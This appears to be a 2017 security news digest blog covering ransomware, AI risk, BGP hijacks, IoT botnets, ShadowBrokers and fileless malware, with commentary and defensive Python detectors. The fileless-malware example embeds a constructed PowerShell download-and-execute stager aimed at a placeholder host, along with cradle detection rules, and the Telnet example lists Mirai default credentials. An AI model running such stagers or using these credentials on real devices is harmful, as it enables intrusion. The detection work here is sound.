Dark Web Ransomware Economy Growing at an Annual Rate of 2,500%
CryptoLocker. GoldenEye. Locky. WannaCry. It’s no secret that 2017 is shaping up to be the most notorious year on record for ransomware. Even a casual news consumer can identify several, if not all, of the menacing ransomware attacks that have cost worldwide businesses an estimated $1 billion this year. | carbonblack.com



Does the Future Need Us?

Putin says the nation that leads in AI ‘will be the ruler of the world’
The Russian president warned that artificial intelligence offers ‘colossal opportunities’ as well as dangers. | theverge.com

Elon Musk: AI ‘vastly more risky than North Korea’
Tesla head warns of dangers of AI and pushes for regulation as OpenAI he backed beats best human players in online DotA 2 championship. | theguardian.com

Why the Future Doesn’t need Us
Why the future doesn’t need us. Our most powerful 21st-century technologies – robotics, genetic engineering, and nanotech – are threatening to make humans an endangered species. A great piece of work from Bill Joy, originally published in Wired magazine almost 20 years ago and still worth the read. | wired.com

Killer robots: World’s top AI and robotics companies urge United Nations to ban lethal autonomous weapons – Future of Life Institute
Press release from the Faculty of Engineering at UNSW, Sydney, Australia. An open letter by leaders of leading robotics and AI companies is launched at the world’s biggest artificial intelligence conference, as the UN delays its meeting on the robot arms race until later this year. The letter is signed by 116 founders of robotics and artificial intelligence companies. | futureoflife.org


Public Leaks are Not Only a Government Concern

Heaps of Windows 10 internal builds, private source code leak online
Unreleased 64-bit ARM versions, Server editions among dumped data. The data – some 32TB of official and non-public installation images and software blueprints that compress down to 8TB – were uploaded to betaarchive.com | theregister.co.uk


Stealth tracking, double-agents, and de-bugging gone horribly wrong

Ultrasonic Beacons Are Tracking Your Every Movement
More than 200 Android mobile applications listen surreptitiously for ultrasonic beacons embedded in audio that are used to track users and serve them with targeted advertising. | threatpost.com

[Comment] SilverPush continues to be installed in apps with millions of downloads. What is most worrisome is that Google requires developers to “disclose how an app collects, uses and shares user data, including the types of parties with whom it’s shared”, which is hard to square with covert listening. Want a more in-depth view? The research paper is available.
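To make the mechanism concrete, here is an added example (not code from the Threatpost piece, the research paper, or SilverPush) of how a near-ultrasonic beacon can be picked out of an audio buffer: a Goertzel single-bin detector scanned across the 18 to 20 kHz band. The band, the 18.5 kHz carrier, the power threshold and the synthesized signals are assumptions for illustration; real beacons modulate an identifier onto the carrier, which this detector does not decode.

```python
"""Added example: find near-ultrasonic beacon energy in PCM audio with the
Goertzel algorithm. Pure standard library; the signals are synthesized here."""
import math

SAMPLE_RATE = 44_100            # Hz, mono PCM
BEACON_BAND = (18_000, 20_000)  # Hz; assumption: the near-ultrasonic band such beacons use
SCAN_STEP = 50                  # Hz between probed bins
POWER_THRESHOLD = 1e-6          # normalized power; assumption, tune on real recordings


def goertzel_power(samples, freq_hz, sample_rate=SAMPLE_RATE):
    """Normalized power of `samples` at `freq_hz` (single-bin DFT via Goertzel)."""
    n = len(samples)
    k = round(n * freq_hz / sample_rate)          # nearest DFT bin
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    power = s1 * s1 + s2 * s2 - coeff * s1 * s2   # |X_k|^2 for the chosen bin
    return power / (n * n)                        # comparable across buffer lengths


def detect_beacon(samples, sample_rate=SAMPLE_RATE):
    """Return (frequency_hz, power) of the strongest bin in BEACON_BAND if it
    exceeds POWER_THRESHOLD, else None."""
    lo, hi = BEACON_BAND
    best = None
    for f in range(lo, hi + 1, SCAN_STEP):
        p = goertzel_power(samples, f, sample_rate)
        if best is None or p > best[1]:
            best = (f, p)
    return best if best[1] > POWER_THRESHOLD else None


def synth(duration_s=0.5, audible_hz=440.0, beacon_hz=None, beacon_amp=0.02):
    """Constructed input: a loud audible tone with an optional quiet beacon tone mixed in.
    beacon_amp=0.02 is 28 dB below the audible tone, i.e. inaudible in practice."""
    n = int(duration_s * SAMPLE_RATE)
    out = []
    for i in range(n):
        t = i / SAMPLE_RATE
        x = 0.5 * math.sin(2 * math.pi * audible_hz * t)
        if beacon_hz is not None:
            x += beacon_amp * math.sin(2 * math.pi * beacon_hz * t)
        out.append(x)
    return out


if __name__ == "__main__":
    print("clean audio:", detect_beacon(synth()))
    print("with beacon:", detect_beacon(synth(beacon_hz=18_500)))
```

The same scan run on a phone's microphone feed is essentially what the beacon SDKs do in reverse, which is why an app that asks for the microphone permission "for features" deserves a second look. Goertzel is used rather than a full FFT because only a narrow band is of interest and it keeps the example dependency-free.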

‘Crazy bad’ bug in Microsoft’s Windows malware scanner can be used to install malware
Critical update for security engine rushed out the door. | theregister.co.uk

[Comment] Say it isn’t so – if Microsoft’s Malware Protection Engine scans a specially crafted file it can allow remote code execution (ironic). Thankfully, Microsoft moved quickly on this with an emergency update. Another ‘win’ for Project Zero.

Beware! Built-in Keylogger Discovered In Several HP Laptop Models
Security researchers discover a built-in keylogger in the Conexant High-Definition (HD) Audio driver pre-installed on several Hewlett-Packard (HP) laptop models. | thehackernews.com

[Comment] Why does an audio driver need a key logger? Key strokes recorded and left in cleartext in a file on the device? It smacks of pre-installed spyware.

EPT, Chipsets, and Reroutes

In Defense of Offensive Hacking Tools
8 points in defence of offence. | medium.com

[Comment] The cyber threat landscape has become blurred and is outpacing our ability to adequately quantify the threat. The new reality is that sophisticated attack tools, exploits, and vulnerability knowledge are all becoming democratized. Let’s call this the Effective Persistent Threat (EPT).

The hijacking flaw that lurked in Intel chips is worse than anyone thought
Patch for severe authentication bypass bug won’t be available until next week. | arstechnica.com

[Comment] Shodan searches show that the number of Internet-facing systems with the bug is limited in comparison with the sheer number of devices carrying this chipset, so the real exposure, counting everything behind a firewall, could be much worse. We do need to ask ourselves how something so fundamental to our computing devices could contain such a flaw for so long.

Russian-controlled telecom hijacks financial services’ Internet traffic
Visa, MasterCard, and Symantec among dozens affected by “suspicious” BGP mishap. | arstechnica.com

[Comment] BGP is essential to the Internet but was never designed with security in mind. Where have I heard that before? Financial institutions …. sure, we have SSL, no problem. How many password resets were done during those seven minutes?
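What a network team can actually do about an incident like this is watch the routing table for its own prefixes. Below is an added example (not from the Ars Technica report or any of the affected networks) of the check: compare each announcement seen at a route collector against an expected prefix-to-origin table and flag foreign origins and more-specifics. The prefixes, ASNs and feed are constructed from documentation ranges and private AS numbers; the function and table names are my own.

```python
"""Added example: flag BGP announcements that disagree with a known-good
prefix -> origin-AS table. Offline; the table and feed are constructed here."""
import ipaddress

# Constructed "expected origin" table (what RPKI ROAs or your own IRR data would give you).
EXPECTED_ORIGIN = {
    "203.0.113.0/24": 64500,    # e.g. a card network's customer-facing block
    "198.51.100.0/23": 64501,   # e.g. a security vendor's block
}

# Constructed route-collector feed: (prefix, AS_PATH as seen by the collector).
OBSERVED = [
    ("203.0.113.0/24", [64510, 64520, 64500]),    # normal path, legitimate origin
    ("203.0.113.0/24", [64510, 64999]),           # someone else originates the whole block
    ("198.51.100.0/24", [64510, 64999]),          # more-specific with a foreign origin
    ("198.51.100.0/24", [64510, 64520, 64501]),   # more-specific, right origin (still worth a look)
    ("192.0.2.0/24", [64510, 64530]),             # prefix we hold no expectation for
]


def covering_entry(prefix):
    """Longest-prefix match of `prefix` against EXPECTED_ORIGIN; None if uncovered."""
    net = ipaddress.ip_network(prefix)
    best = None
    for p, asn in EXPECTED_ORIGIN.items():
        cand = ipaddress.ip_network(p)
        if cand.version == net.version and net.subnet_of(cand):
            if best is None or cand.prefixlen > best[0].prefixlen:
                best = (cand, asn)
    return best


def classify(prefix, as_path):
    """Classify one announcement: ok / origin-mismatch / more-specific / unknown-prefix."""
    match = covering_entry(prefix)
    if match is None:
        return "unknown-prefix"
    covering, expected_asn = match
    origin = as_path[-1]              # last ASN in the path is the originator
    if origin != expected_asn:
        return "origin-mismatch"      # the classic origin hijack
    if ipaddress.ip_network(prefix).prefixlen > covering.prefixlen:
        return "more-specific"        # wins longest-match routing even with the right origin
    return "ok"


def find_suspicious(updates):
    """Return [(prefix, as_path, verdict)] for everything that is not plain 'ok'."""
    out = []
    for prefix, path in updates:
        verdict = classify(prefix, path)
        if verdict != "ok":
            out.append((prefix, path, verdict))
    return out


if __name__ == "__main__":
    for prefix, path, verdict in find_suspicious(OBSERVED):
        print(f"{verdict:16} {prefix:18} path={path}")
```

This catches the blunt cases, which is what the reported incident was. It does not catch a hijacker who prepends the legitimate origin ASN to a forged path; that needs RPKI origin validation at your upstreams plus path-aware monitoring, and even then the seven minutes of redirected traffic are the reason SSL alone is not reassuring: anyone who can draw the traffic can also answer a domain-validation challenge for a certificate.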

Elections, Geo-aware malware, and SS7 vs. 2FA

Hackers emit 9GB of stolen Macron ’emails’ two days before French presidential election
Hmm, who could possibly do such a thing? | theregister.co.uk

‘Fatboy’ Ransomware Extorts Money Based on Victims’ Countries
Cybersecurity researchers have discovered a new variant of ransomware that automatically adjusts its ransom demand from victims based on their location. Targets in wealthier countries will be forced to pay…  | lifars.com

After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts
O2 confirms online thefts using stolen 2FA SMS codes. | theregister.co.uk


May 5th, 2017 | The 3Ps: Phishing, Patching, and Passwords

Phishing – Google Docs and New Tactics

Patching – Intel

Passwords – World Password Day + Timely Guidance from NIST


May 1, 2017 | Threat Reports

DBIR 2017:

Highlights include:

  • 88% of breaches fall into the nine patterns we first identified back in 2014.
  • 95% of phishing attacks that led to a breach were followed by some sort of software installation.
  • In the 2014 DBIR, ransomware was the 22nd most common form of malware. This year it’s number five, and the most common in the Crimeware pattern.

FireEye M-trends:

Highlights include:

  • The global median time from compromise to discovery has dropped significantly, from 146 days in 2015 to 99 days in 2016.
  • Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two.
[Comment] Trends and more trends – I am a big fan of Verizon’s DBIR reports.


April 29, 2017 | Vigilantes, Disclosure fall-out, and Malware Upgrades

Vigilantes – Hajime

Hajime IoT worm fights the Mirai botnet for control of easy-to-hack IoT products. Hajime, like Mirai before it, takes advantage of factory-set (default) username and password combinations to brute-force its way into unsecured devices with open Telnet ports. Analysis from Rapidity Networks is found here.

Related posts.

  • Mirai and Hajime Locked Into IoT Botnet Battle. threatpost
  • Hajime, the mysterious evolving botnet. SecureList
  • Hajime Botnet is Now 300,000-Strong. infosecurity-magazine
  • Hajime Botnet Reaches 300,000 Hosts With No Malicious Functions. darknet
  • A vigilante is putting a huge amount of work into infecting IoT devices. arstechnica
[Comment] We need to ask ourselves: (1) why do we make it so easy for compromises to happen by not bothering to change default usernames and passwords, and (2) Telnet! Hard-coded passwords! Are you serious? Let’s demand more basic security from these IoT products.
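The brute-forcing that both Mirai and Hajime rely on is loud in the logs if anyone is looking. As an added example (not from Rapidity Networks or any of the linked write-ups), here is the detection a practitioner would run over Telnet authentication logs: per-source burst counting, matching attempted pairs against a list of known factory credentials, and flagging a success that follows a run of failures. The log format and the IP addresses are constructed; the credential pairs are a handful of the ones in Mirai's published list.

```python
"""Added example: spot Mirai/Hajime-style default-credential guessing in Telnet
authentication logs. Offline; the log lines below are constructed, not real."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A handful of the factory username/password pairs from the published Mirai credential list.
KNOWN_DEFAULTS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"),
    ("admin", "admin"), ("root", "12345"), ("root", "root"),
}

# Constructed honeypot-style Telnet auth log. A honeypot records the guessed
# credentials; a production daemon must never log passwords. The format is an assumption.
SAMPLE_LOG = """\
2017-04-27T10:15:01Z telnet-honeypot src=198.51.100.7 user=root pass=xc3511 result=FAIL
2017-04-27T10:15:02Z telnet-honeypot src=198.51.100.7 user=root pass=vizxv result=FAIL
2017-04-27T10:15:02Z telnet-honeypot src=198.51.100.7 user=root pass=admin result=FAIL
2017-04-27T10:15:03Z telnet-honeypot src=198.51.100.7 user=admin pass=admin result=FAIL
2017-04-27T10:15:03Z telnet-honeypot src=198.51.100.7 user=root pass=12345 result=FAIL
2017-04-27T10:15:04Z telnet-honeypot src=198.51.100.7 user=root pass=root result=OK
2017-04-27T10:20:00Z telnet-honeypot src=203.0.113.9 user=operator pass=*** result=FAIL
2017-04-27T10:30:00Z telnet-honeypot src=203.0.113.9 user=operator pass=*** result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ src=(?P<src>\S+) user=(?P<user>\S+) pass=(?P<pw>\S+) result=(?P<res>\S+)$"
)


def parse(log_text):
    """Turn log lines into (timestamp, src, user, password, success) tuples; skip junk lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["src"], m["user"], m["pw"], m["res"] == "OK"))
    return events


def analyze(events, burst=5, window=timedelta(seconds=60), fails_before_ok=3):
    """Per source IP, collect reasons to alert: a burst of attempts inside `window`,
    known default pairs being tried, or a login that succeeds after repeated failures."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        reasons = []
        for i, (start, *_) in enumerate(evs):          # sliding-window burst check
            j = i
            while j < len(evs) and evs[j][0] - start <= window:
                j += 1
            if j - i >= burst:
                reasons.append(f"{j - i} attempts within {int(window.total_seconds())}s")
                break
        defaults = {(u, p) for _, _, u, p, _ in evs if (u, p) in KNOWN_DEFAULTS}
        if defaults:
            reasons.append(f"{len(defaults)} known default credential pair(s) tried")
        fails = 0
        for _, _, _, _, ok in evs:
            if ok:
                if fails >= fails_before_ok:
                    reasons.append(f"login succeeded after {fails} failures")
                break
            fails += 1
        if reasons:
            findings[src] = reasons
    return findings


if __name__ == "__main__":
    for src, reasons in analyze(parse(SAMPLE_LOG)).items():
        print(src, "->", "; ".join(reasons))
```

The second source in the sample (one failure, then a success ten minutes later) is what a human mistyping a password looks like and produces no finding; the first is a bot working down a credential list. The better fix is still the one in the comment above: no Telnet, no factory passwords.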

Disclosure fall-out – ShadowBrokers

  1. Script kiddie bonanza – exploit code is released and scans show tens of thousands of Windows systems implanted with the DoublePulsar kernel backdoor.
  2. SWIFT – tooling aimed at global financial messaging; how many service bureaus were compromised?
  3. Microsoft anticipatory patches – how did Microsoft patch so quickly, before the disclosure no less? Did the NSA tip Microsoft off on the extent and particulars of the release?
  4. EOL – thousands of vulnerable systems, with no patch available from Microsoft, are now being actively exploited.

Related posts.

  • Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs. thehackernews
  • NSA’S DOUBLEPULSAR Kernel Exploit in use Internet-wide. threatpost
  • Tens of thousands Windows systems implanted with NSA’s DoublePulsar. helpnetsecurity
  • NSA-leaking Shadow Brokers just dumped its most damaging release yet. arstechnica
  • Protecting customers and evaluating risk. Microsoft Technet
  • Microsoft Says It Has Patched Leaked NSA Hacks. Fortune
[Comment] The unintended fallout of this is that a few of these exploits target systems that are EOL. Thus, no patches available. Now you would think that doesn’t matter as – who would still have EOL systems facing the Internet?

Upgrades – Fileless malware

So why is fileless malware so dangerous, and why will it continue to expand for the foreseeable future? In simple terms: it works. Some malware detection systems are capable of detecting and containing fileless malware, but most are not.

Related Posts.

  • Hard Target: Fileless Malware. threatpost
  • Why Fileless Malware will Continue Its Rapid Expansion. lastline
  • Will Fileless Malware Push the antivirus Industry into Oblivion? helpnetsecurity
[Comment] Fileless malware is stealthy: techniques such as polymorphism, implanting watchdogs and revoking permissions are used to evade detection. Coupled with abuse of built-in features like Windows Management Instrumentation (WMI) and Windows PowerShell, attackers blend into the normal noise of the network, compromise endpoints without ever storing a binary on disk, and keep the attack hard to detect and track.
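Because nothing lands on disk, the useful telemetry is the command line and the WMI subscription, not a file hash. As an added example (not from the Threatpost, Lastline or Help Net Security posts), here is the kind of rule set a detection engineer would run over process-creation and WMI events: spot encoded PowerShell, decode it, and re-scan the decoded script for download cradles and in-memory execution, plus the WMI consumer classes used for persistence and remote execution. All events, the stager, the host name and the example.invalid URL are constructed; the rule names are my own.

```python
"""Added example: score Windows process-creation and WMI events for the fileless
tradecraft described above (encoded PowerShell, download cradles, WMI persistence).
Offline; every event below is constructed, not taken from a real host."""
import base64
import re

# The encoded-command rule doubles as the extractor for the base64 payload.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
RULES = [
    ("encoded-command", ENCODED_RE),
    ("hidden-window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("download-cradle", re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I)),
    ("in-memory-exec",  re.compile(r"\bIEX\b|Invoke-Expression|FromBase64String|Reflection\.Assembly", re.I)),
    ("wmi-persistence", re.compile(r"CommandLineEventConsumer|ActiveScriptEventConsumer|__EventFilter", re.I)),
    ("wmi-remote-exec", re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b", re.I)),
]


def decode_encoded_command(text):
    """Return the UTF-16LE script behind a -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:            # binascii.Error is a ValueError: truncated or bogus base64
        return None


def scan_event(text):
    """Set of rule names that fire on the raw event text and on its decoded payload."""
    hits = {name for name, rx in RULES if rx.search(text)}
    decoded = decode_encoded_command(text)
    if decoded:
        hits |= {name for name, rx in RULES if rx.search(decoded)}
    return hits


def triage(events, min_hits=1):
    """Return [(event_id, sorted_hits)] for events that trip at least `min_hits` rules."""
    out = []
    for event_id, text in events:
        hits = scan_event(text)
        if len(hits) >= min_hits:
            out.append((event_id, sorted(hits)))
    return out


# Constructed stager (example.invalid is a reserved name) in the -Enc form an attacker would ship.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

# (event id, command line / event text); 4688 = process creation, 5861 = WMI permanent consumer.
SAMPLE_EVENTS = [
    (4688, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -W Hidden -Enc " + ENCODED),
    (4688, r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"),
    (4688, 'wmic /node:fileserver01 process call create "powershell -enc ' + ENCODED + '"'),
    (5861, 'Namespace=root\\subscription; Consumer=CommandLineEventConsumer.Name="updater"; '
           'Filter=__EventFilter.Name="updater"'),
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(event_id, hits)
```

Decoding before matching is the point: the raw command line of the first event shows only `-Enc` and a blob, and the cradle is invisible until the UTF-16LE payload is recovered. The backup script in the second event trips nothing, which is deliberate; `-ExecutionPolicy Bypass` on its own is too common in administration to alert on, so real deployments weight rules and require a combination (`min_hits=2`) before paging anyone.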